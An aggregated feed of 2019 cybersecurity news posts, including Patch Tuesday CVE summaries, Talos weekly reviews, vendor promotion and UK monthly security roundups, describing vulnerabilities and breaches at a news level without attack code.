Google researcher James Forshaw discovered a new class of vulnerability in Windows before any bug had actually been exploited. The involved parts of the flaw "showed that there were all the basic elements to create a significant elevation of privilege attack, enabling any user program to open any file on the system, regardless of whether the user should have permission to do so," reports Ars Technica. Thankfully, Microsoft said that the flaw was never actually exposed in any public versions of Windows, but said that it will ensure future releases of Windows will not feature this class of elevation of privilege. Peter Bright explains in detail how the flaw works. Here's an excerpt from his report: The basic rule is simple enough: when a request to open a file is being made from user mode, the system should check that the user running the application that's trying to open the file has permission to access the file. The system does this by examining the file's access control list (ACL) and comparing it to the user's user ID and group memberships. However, if the request is being made from kernel mode, the permissions checks should be skipped. That's because the kernel in general needs free and unfettered access to every file. As well as this security check, there's a second distinction made: calls from user mode require strict parameter validation to ensure that any memory addresses being passed in to the function represent user memory rather than kernel memory. Calls from kernel mode don't need that same strict validation, since they're allowed to use kernel memory addresses. Accordingly, the kernel API used for opening files in NT's I/O Manager component looks to see if the caller is calling from user mode or kernel mode. Then the API passes this information on to the next layer of the system: the Object Manager, which examines the file name and figures out whether it corresponds to a local filesystem, a network filesystem, or somewhere else. The Object manager then calls back in to the I/O Manager, directing the file-open request to the specific driver that can handle it. Throughout this, the indication of the original source of the request -- kernel or user mode -- is preserved and passed around. If the call comes from user mode, each component should perform strict validation of parameters and a full access check; if it comes from kernel mode, these should be skipped. Unfortunately, this basic rule isn't enough to handle every situation. For various reasons, Windows allows exceptions to the basic user-mode/kernel-mode split. Both kinds of exceptions are allowed: kernel code can force drivers to perform a permissions check even if the attempt to open the file originated from kernel mode, and contrarily, kernel code can tell drivers to skip the parameter check even if the attempt to open the file appeared to originate from user mode. This behavior is controlled through additional parameters passed among the various kernel functions and into filesystem drivers: there's the basic user-or-kernel mode parameter, along with a flag to force the permissions check and another flag to skip the parameter validation...

Read more of this story at Slashdot.

Juniper Networks broadens commitment to open programmability with support of SONiC

Juniper Networks, an industry leader in automated, scalable and secure networks, announced native integration of Juniper’s platforms with Software for Open Networking in the Cloud (SONiC), which was developed and contributed to the Open Compute Project (OCP) Foundation by Microsoft. This integration will give cloud providers a simplified and automated switch management platform, enhanced by the rich routing and deep telemetry innovations valued by customers. Introduced by Microsoft in 2016, SONiC is a breakthrough for … More

The post Juniper Networks broadens commitment to open programmability with support of SONiC appeared first on Help Net Security.

Cyber Security Week in Review (March 15)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • The U.S. warned Germany that using Huawei’s 5G technology could result in a drop in information-sharing. American officials have consistently criticized the use of the Chinese company’s technology, saying they pose a national security risk. If other countries were to use Huawei’s 5G network, the U.S. says it would fear its intelligence was not being kept safe. 
  • It is reported that a hacking group stole an estimated six terabytes of data from the Citrix enterprise network. The company said it took steps to contain this data breach after it was alerted by the FBI, but thousands of customers’ information could still be at risk. It is not yet known what the nature of the information taken was.
  • Adobe fixed multiple remote code execution vulnerabilities in Photoshop and Digital Editions. The company released its monthly security update earlier this week. Two of the vulnerabilities were classified as critical, as an attacker could exploit them to execute code under the context of the current user.

From Talos


  • A new point-of-sale malware known as “GlitchPOS” has popped up on some online marketplaces. The malware is easy enough to install and use that virtually any user could buy their way into setting up their own botnet. We believe with high confidence that this is not the first malware created by this actor.
  • Microsoft released its monthly security update earlier this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories — one covering security updates to Adobe Flash Player and another concerning SHA-2.
  • CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw.

The rest of the news


  • Video app TikTok paid a $5.7 million fine to the Federal Trade Commission this week as part of a settlement. The FTC rules that the app, which allows users to upload short videos of them performing songs, improperly handled the data of users who are under the age of 13.
  • Two U.S. Senators introduced a new bill that would overhaul the country’s child privacy laws. The new bill would give parents complete control over their children's data online, and even allow them to completely erase information from certain websites. It would also ban targeted ads toward anyone under the age of 13.
  • Security researchers discovered a critical flaw in Switzerland’s new voting system that would allow attackers to manipulate votes. The group is now urging the Swiss government to halt the rollout of the online system.
  • Social media hackers are stepping up their activity as Brexit votes continue in the U.K. Researchers discovered an uptick in fake accounts that are spreading pro-Brexit sentiment over the past several weeks.
  • The U.S.’s Office of the Inspector General says NASA’s information security program contains several critical vulnerabilities. A new report states that the space agency could be open to an attack from a nation-state actor.


Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs

The scheduled Microsoft March Patch Tuesday update bundle has rolled-out. This update bundle also addresses numerous security flaws. In addition,

Microsoft March Patch Tuesday Addressed Multiple Flaws And Two Zero-Day Bugs on Latest Hacking News.

What you need to know for Patch Tuesday, March 2019

By SophosLabs Offensive Security Research Microsoft released their monthly security updates for March this past Tuesday. This month’s fixes address 64 vulnerabilities that affect Windows and a range of software that runs on Windows, mainly the Internet Explorer and Edge browsers. In addition, there was a patch released for one critical vulnerability in Adobe Flash. […]

Microsoft Releases Patches for 64 Flaws — Two Under Active Attack

It's time for another batch of "Patch Tuesday" updates from Microsoft. Microsoft today released its March 2019 software updates to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. The update addresses flaws in Windows, Internet Explorer, Edge, MS

VERT Threat Alert: March 2019 Patch Tuesday Analysis

Today’s VERT Alert addresses Microsoft’s March 2019 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-821 on Wednesday, March 13th.  In-The-Wild & Disclosed CVEs CVE-2019-0754 This CVE describes a Denial of Service vulnerability that could cause a target system to stop responding when code is executed on the […]… Read More

The post VERT Threat Alert: March 2019 Patch Tuesday Analysis appeared first on The State of Security.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.


A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.

Microsoft Patch Tuesday — March 2019: Vulnerability disclosures and Snort coverage


Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories — one covering security updates to Adobe Flash Player and another concerning SHA-2.

This month’s security update covers security issues in a variety of Microsoft’s products, including the VBScript scripting engine, Dynamic Host Configuration Protocol and the Chakra scripting engine. For coverage of these vulnerabilities, read the SNORTⓇ blog post here.

Critical vulnerabilities

Microsoft disclosed 17 critical vulnerabilities this month, all of which we will highlight below.

CVE-2019-0592 is a memory corruption vulnerability in the Chakra scripting engine that could allow an attacker to elevate their privileges. The bug lies in the way that the scripting engine handles objects in memory. In order to exploit this vulnerability, an attacker would need to trick a user into visiting a specially crafted, malicious web page in the Microsoft Edge web browser.

CVE-2019-0763 is a remote code execution vulnerability that exists when the Internet Explorer web browser improperly handles objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a malicious web page while using Internet Explorer.

CVE-2019-0756 is a remote code execution vulnerability in the Microsoft XML Core Services MSXML parser. An attacker can exploit this bug by tricking the user into opening a specially crafted website designed to invoke MSXML through a web browser. Eventually, the attacker would gain the ability to execute malicious code and take control of the user’s system.

CVE-2019-0609, CVE-2019-0639, CVE-2019-0680, CVE-2019-0769, CVE-2019-0770, CVE-2019-0771 and CVE-2019-0773 are all memory corruption vulnerabilities in Microsoft’s scripting engine that exist due to the way Microsoft Edge handles objects in memory. An attacker could exploit these bugs to corrupt memory in a way that would allow them to execute arbitrary code in the context of the current user. A user would trigger this vulnerability if they visited a specially crafted, malicious web page in Edge.

CVE-2019-0784 is a remote code execution vulnerability that exists due to the way ActiveX Data Objects (ADO) handle objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. Alternatively, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2019-0603 is a remote code execution vulnerability in Windows Deployment Services TFTP Server. The bug lies in the way the server handles objects in memory. If an attacker were to exploit this vulnerability, they’d gain the ability to execute arbitrary code with elevated permissions on a target system.

CVE-2019-0697, CVE-2019-0698 and CVE-2019-0726 are remote code execution vulnerabilities in the Windows DHCP client. The vulnerability triggers when the client receives specially crafted DHCP responses to a client, potentially allowing an attacker to execute arbitrary code on the target machine.

CVE-2019-0666 and CVE-2019-0667 are vulnerabilities in the VBScript engine that exist due to the way the engine handles objects in memory. An attacker could use these bugs to corrupt memory in a way that would allow them to execute arbitrary code in the context of the current user. A user could trigger these vulnerabilities by visiting an attacker-created website through Internet Explorer. An attacker could also provide them with an embedded ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

Important vulnerabilities

This release also contains 45 important vulnerabilities:

Moderate

There was one moderate vulnerability in this release: CVE-2019-0816, a security feature bypass vulnerability in Azure SSH Keypairs.

Low

The only low vulnerability in this release is CVE-2019-0777, a cross-site scripting vulnerability in Team Foundation.

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 46554, 46555, 48051, 48052, 49172, 49173, 49364 - 49369, 49371, 49372, 49378 - 49395, 49400 - 49403

Unpatched Vulnerability in Microsoft Office

Researchers at the RSA Conference unveiled a zero day flaw in Microsoft Office that, when exploited on a Java enabled system, could lead to complete ownage of the end point. Microsoft Security Research has responded and said they won't be releasing a patch for it now, but might at a future date. Note the flaw is being actively exploited in the wild, not a theoretical situation. However, researchers admit this is not an easy flaw to exploit and requires in-depth knowledge of the format. Details are here at this ThreatPost article:

https://threatpost.com/zero-day-exploit-microsoft/142327/

Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples

Since the release of “Trend Micro Cloud App Security 2017 Report” about a year ago, threats using email as the delivery vector have grown significantly. Business Email Compromise (BEC) scams have already caused USD $12.5 billion in global losses as of 2018 – a 136.4% increase from the $5.3 billion reported in 2017. The popularity of Office 365 has positioned itself as an attractive target for cybercriminals.

In January, 2019, the U.S. Secret Service issued a bulletin calling out phishing attacks that specifically target organizations using Office 365.

Trend Micro™ Cloud App Security™ is an API-based service protecting Microsoft® Office 365™ Exchange™ Online, OneDrive® for Business, and SharePoint® Online platforms. Using multiple advanced threat protection techniques, it acts as a second layer of protection after emails and files have passed through Office 365 scanning.

In 2018, Cloud App Security caught 8.9 million high-risk email threats missed by Office 365 security. Those threats include one million malware, 7.7 million phishing attempts, and 103,955 BEC attempts.  Each of the blocked threats represent potential attacks that could result in monetary and productivity losses. For example, the average cost per BEC incident is now USD $159,000. Blocking 103,000 BEC attacks means potentially saving our customers $16 billion!

No matter what Office 365 plan you use, or whether a third-party email gateway is deployed, customers still stop a significant number of potentially damaging threats with Trend Micro Cloud App Security.

Customer examples: Additional detections after Office 365 built-in security (2018 data)

For customers using Office 365 built-in security, they saw obvious value from deploying Trend Micro Cloud App Security. For example, an internet company with 10,000 Office 365 E3 users found an additional 16,000 malware, 232,000 malicious URLs, 174,000 phishing emails, and 2,000 BEC attacks in 2018.

Customer examples: Additional Detections after Office 365 Advanced Threat Protection (2018 data)

Customers using Office 365 Advanced Threat Protection (ATP) also need an additional layer of filtering as well. A logistics company with 80,000 users of E3 and ATP detected an additional 28,000 malware and 662,000 malicious URLs in 2018 with Trend Micro Cloud App Security.

Customer examples: Additional Detections after third-party email gateway and Office 365 built-in security (2018 data)

Many customers use a third-party email gateway to scan emails before they’re delivered to their Office 365 environment. Despite these gateway deployments, many of the sneakiest and hardest to detect threats still slipped though. Plus, a gateway solution can’t detect internal email threats, which can originate from compromised devices or accounts within Office 365.

For example, a business with 120,000 Office 365 users with a third-party email gateway stopped an additional 166,823 phishing emails, 237,222 malicious URLs, 78,246 known and unknown malware, and 1,645 BEC emails with Cloud App Security.

Innovative technologies to combat new email threats 

Continuous innovation is one key reason why Trend Micro is able to catch so many threats missed by Office 365 and/or third-party email gateways. In 2018, two new advanced features were introduced by Cloud App Security to help businesses stay protected from advanced email threats.

The first is Writing Style DNA, an artificial intelligence (AI)-powered technology that can help detect email impersonation tactics used in BEC scams. It uses AI to recognize a user’s writing style based on past emails and then compares it to suspected forgeries.

The second technology is a feature that combines AI and computer vision technology to help detect and block attempts at credential phishing in real time, especially now that more schemes use fake, legitimate-looking login webpages to deceive email users. A login page’s branded elements, login form, and other website components are checked by this tool to determine if a page is legitimate.

Additionally, Trend Micro uniquely offers a pre-execution machine learning engine to find unknown malware in addition to its award-winning Deep Discovery sandbox technology. The pre-execution machine learning engine provides better threat coverage while improving email delivery by finding threats before the sandbox layer.

Check out the Trend Micro Cloud App Security 2018 Report to get more details on the type of threats blocked by this product and common email attacks analyzed by Trend Micro Research in 2018.

The post Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples appeared first on .

Tripwire Patch Priority Index for February 2019

Tripwire’s February 2019 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Spoofing, Security Feature Bypass and Information Disclosure vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for February 2019 appeared first on The State of Security.

Cyber Security Roundup for February 2019

The perceived threat posed by Huawei to the UK national infrastructure continued to make the headlines throughout February, as politicians, UK government agencies and the Chinese telecoms giant continued to play out their rather public spat in the media. See my post Is Huawei a Threat to UK National Security? for further details. And also, why DDoS might be the greater threat to 5G than Huawei supplied network devices.

February was a rather quiet month for hacks and data breaches in the UK, Mumsnet reported a minor data breach following a botched upgrade, and that was about it. The month was a busy one for security updates, with Microsoft, Adobe and Cisco all releasing high numbers of patches to fix various security vulnerabilities, including several released outside of their scheduled monthly patch release cycles.

A survey by PCI Pal concluded the consequences of a data breach had a greater impact in the UK than the United States, in that UK customers were more likely to abandon a company when let down by a data breach. The business reputational impact should always be taken into consideration when risk assessing security.


Another survey of interest was conducted by Nominet, who polled 408 Chief Information Security Officers (CISOs) at midsize and large organisations in the UK and the United States. A whopping 91% of the respondents admitted to experiencing high to moderate levels of stress, with 26% saying the stress had led to mental and physical health issues, and 17% said they had turned to alcohol. The contributing factors for this stress were job security, inadequate budget and resources, and a lack of support from the board and senior management. A CISO role can certainly can be a poisoned-chalice, so its really no surprise most CISOs don't stay put for long.

A Netscout Threat Landscape Report declared in the second half of 2018, cyber attacks against IoT devices and DDoS attacks had both rose dramatically. Fuelled by the compromise of high numbers of IoT devices, the number of DDoS attacks in the 100GBps to 200GBps range increased 169%, while those in the 200GBps to 300GBps range exploded 2,500%. The report concluded cybercriminals had built and used cheaper, easier-to-deploy and more persistent malware, and cyber gangs had implemented this higher level of efficiency by adopting the same principles used by legitimate businesses. These improvements has helped malicious actors greatly increase the number of medium-size DDoS attacks while infiltrating IoT devices even quicker.

In a rare speech, Jeremy Fleming, the head of GCHQ warned the internet could deteriorate into "an even less governed space" if the international community doesn't come together to establish a common set of principles. He said "China, Iran, Russia and North Korea" had broken international law through cyber attacks, and made the case for when "offensive cyber activities" were good, saying "their use must always meet the three tests of legality, necessity and proportionality. Their use, in particular to cause disruption or damage - must be in extremis".  Clearly international law wasn't developed with cyber space in mind, so it looks like GCGQ are attempting to raise awareness to remedy that.

I will be speaking at the e-crime Cyber Security Congress in London on 6th March 2019, on cloud security, new business metrics, future risks and priorities for 2019 and beyond.

Finally, completely out of the blue, I was informed by 4D that this blog had been picked by a team of their technical engineers and Directors as one of the best Cyber Security Blogs in the UK. The 6 Best Cyber Security Blogs - A Data Centre's Perspective Truly humbled and in great company to be on that list.

BLOG
NEWS 
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

    Cyber Security Week in Review (Feb. 15, 2019)


    Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

    Top headlines this week


    • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
    • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
    • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

    From Talos


    • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
    • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
    • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

    Malware roundup


    • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
    • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
    • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

    The rest of the news


    • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
    • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
    • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


    Microsoft Patch Tuesday — February 2019: Vulnerability disclosures and Snort coverage


    Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player

    This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine and the Internet Explorer and Exchange web browsers. For coverage of these vulnerabilities, read the SNORTⓇ blog post here.

    Critical vulnerabilities

    Microsoft disclosed 20 critical vulnerabilities this month, 12 of which we will highlight below.

    CVE-2019-0590, CVE-2019-0591, CVE-2019-0593, CVE-2019-0640, CVE-2019-0642, CVE-2019-0644, CVE-2019-0651, CVE-2019-0652 and CVE-2019-0655 are all memory corruption vulnerabilities in Microsoft scripting engine. The bugs all lie in the way the engine processes objects in memory in the Microsoft Edge web browser. An attacker could exploit this vulnerability to corrupt the machine’s memory, eventually allowing them to execute code remotely in the context of the current users. A user could trigger this bug by either visiting a malicious web page while using Edge, or by accessing specially crafted content created by the attacker.

    CVE-2019-0606 is a memory corruption vulnerability in Microsoft Internet Explorer. The problem lies in the way the web browser accesses objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted website or user-created content in Internet Explorer. Once triggered, the attacker could gain the ability to execute code remotely in the context of the current user.

    CVE-2019-0645 and CVE-2019-0650 are memory corruption vulnerabilities that exist in Microsoft Edge when the web browser fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a maliciously crafted website in Edge, or clicking on specially crafted content. An attacker could use this bug to gain the ability to execute arbitrary code in the context of the current user.

    These are the other critical vulnerabilities:


    Important vulnerabilities

    This release also contains 46 important vulnerabilities:

    Moderate

    There were also three moderate vulnerabilities in this release: CVE-2019-0641, CVE-2019-0643 and CVE-2019-0670.

    Coverage 

    In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

    Snort rules: 49128 - 49170

    Cyber Security Roundup for January 2019

    The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

    B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included: the first and last names of individuals caught or suspected of stealing goods from stores descriptions of the people involved, their vehicles and other incident-related information the product codes of the goods involved the value of the associated loss.

    Hundreds of German politicians, including Chancellor Angela Merkel, have had personal details stolen and published online at the start of January.  A 20 year suspect was later arrested in connection to this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

    Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
    Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

    The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

    Security company ForeScout said it had found thousands of vulnerable devices using search engines Shodan and Cenys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control over after it developed its own proof-of-concept malware.

    Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password invoke by Reddit in response. A Reddit admin said "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access."

    Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

    A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email attack made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

    January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


    BLOG
    NEWS
    AWARENESS, EDUCATION AND THREAT INTELLIGENCE
    REPORTS

    Microsoft Windows 7 & Windows 2008 End of Life

    Microsoft Windows 7 and Windows Server 2008 End of Life is fast approaching. 'End of Life' is the point where the operating system will be no longer supported with security patches, unless you (as a business) take out a rather expensive extended warranty agreement with Microsoft.



    As a home user, you should upgrade from Windows 7 without delay, as there are significant performance improvements to be gained with Windows 10. I always recommend installing Windows 10 from scratch onto a blank hard disk drive, rather than using the upgrade option. Ideally install onto a new Solid State Drive (SSD), which improves an operating system's performance massively. SSDs have come down in price in recent months, making a decent memory size SSD an affordable option. Always ensure all your important documents and data are backed up at all times, double check before attempting an operating system installation or upgrade.

    Where as a businesses you have Windows 7 and Windows Server 2008 present, it is imperative not to leave your upgrade plan until the last minute, as mass operating systems upgrades within business can be fraught with delays due to technical issues to overcome, and unforeseen business circumstances. Also, Microsoft Windows Server 2016 has a significant virtualisation perform kick over 2008 & 2012 versions. And given the high security risk or cost in purchasing a Microsoft Extended Warranty, there really can be no solid business reason for delaying an upgrade project.

    Microsoft Product     End of Life Date
    Windows 7                      14/01/2020
    Windows Server 2008    14/01/2020
    Office 2010                     13/10/2020
    Windows Server 2012    10/01/2023
    Windows 8/8.1                10/01/2023
    Office 2013                     11/04/2023
    Windows 10                    14/10/2025
    Office 2016                     14/10/2025

    For further Microsoft EOF details see https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet

    Cyber Security Roundup for December 2018

    The final Cyber Security Roundup of 2018 concludes reports of major data breaches, serious software vulnerabilities and evolving cyber threats, so pretty much like the previous 11 months of the year.

    5.3 millions users of "make your own avatar" app Boomoji had their accounts compromised, after the company reportedly didn't secure their internet connected databases properly. "Question and Answer" website Quora also announced the compromise of 100 million of its user accounts following a hack.


    A large data breach reported in Brazil is of interest, a massive 120 million Brazilian citizens personal records were compromised due to a poorly secured Amazon S3 bucket. This is not the first mass data breach caused by an insecure S3 bucket we've seen in 2018, the lesson to be learnt in the UK, is to never assume or take cloud security for granted, its essential practice to test and audit cloud services regularly.

    Amongst the amazing and intriguing space exploration successes reported by NASA in December, the space agency announced its employee's personal data may had been compromised. Lets hope poor security doesn't jeopardise the great and highly expensive work NASA are undertaking.  
    NASA InSight Lander arrives on Mars 

    It wouldn't be normal for Facebook not to be in the headlines for poor privacy, this time Facebook announced a Photo API bug which exposed 6.8 million user images

    Away from the political circus that is Brexit, the European Parliament put into a law a new Cybersecurity Act. Because of the Brexit making all the headlines, this new law may have gone under the radar, but it certainly worth keeping an eye on, even after UK leaves the EU. The EU Parliament has agreed to increase the budget for the ENISA (Network & InfoSec) agency, which will be rebranded as the "EU Agency for Cybersecurity". The Cybersecurity Act will establish an EU wide framework for cyber-security certifications for online services and customer devices to be used within the European Economic Area, and will include IoT devices and critical infrastructure technology. Knowing the EU's love of regulations, I suspect these new best practice framework and associated accreditations to be turned into regulations further down the line, which would impact any tech business operating in European Union.

    The UK Parliament enacted the "The Health and Social Care (National Data Guardian) Act", which also went under the radar due to all the Brexit political noise. The act requires the appointment of a data guardian within England and Wales. The data guardian will publish guidance on the processing of health and adult social care data for use by public bodies providing health or social care services, and produce an annual report.

    Chinese telecoms giant Huawei had plenty of negative media coverage throughout December, with UK government pressuring BT into not using Huawei kit within BT's new 5G network, due to a perceived threat to UK's future critical national infrastructure posed by the Chinese stated-backed tech giant.  The UK Defence Secretary Gavin Williamson said he had "very deep concerns" about Huawei being involved in new UK mobile network.
    Security company Insinia cause controversy after it took over the Twitter accounts by Eamon Holmes, Louis Theroux and several others celebs. Insinia said it had managed the account takeover by analysing the way Twitter handles messages posted by phone, to inject messages onto the targeted accounts by analysing the way the social network interacted with smartphones when messages are sent. However, Insinia were accused of being unethical and breaking the UK Computer Misuse Act in some quarters.

    Unsecured internet connected printers are being hacked again, this time they were used to sent print out messages of support for Swedish YouTube star PewDiePie. A hacker named TheHackerGiraffe was said to have targeted up 50,000 printers after using Shodan to search for open printer ports online, the scan was said to have found 800,000 vulnerable printers.

    An Financial Conduct Authority (FCA) report warned UK banks about their over-reliance on third-party security providers. The FCA said companies "generally lacked board members with strong familiarity or specific technical cyber-expertise. External expertise may be helpful but may also, if overly relied on, undermine the effectiveness of the ‘three lines of defence’ model in identifying and managing cyber-risks in a timely way. The report also warned about supply-chain security, especially the role that firms play in other organisations’ supply chains.

    NEWS

    AWARENESS, EDUCATION AND THREAT INTELLIGENCE
    REPORTS

    126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

    The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

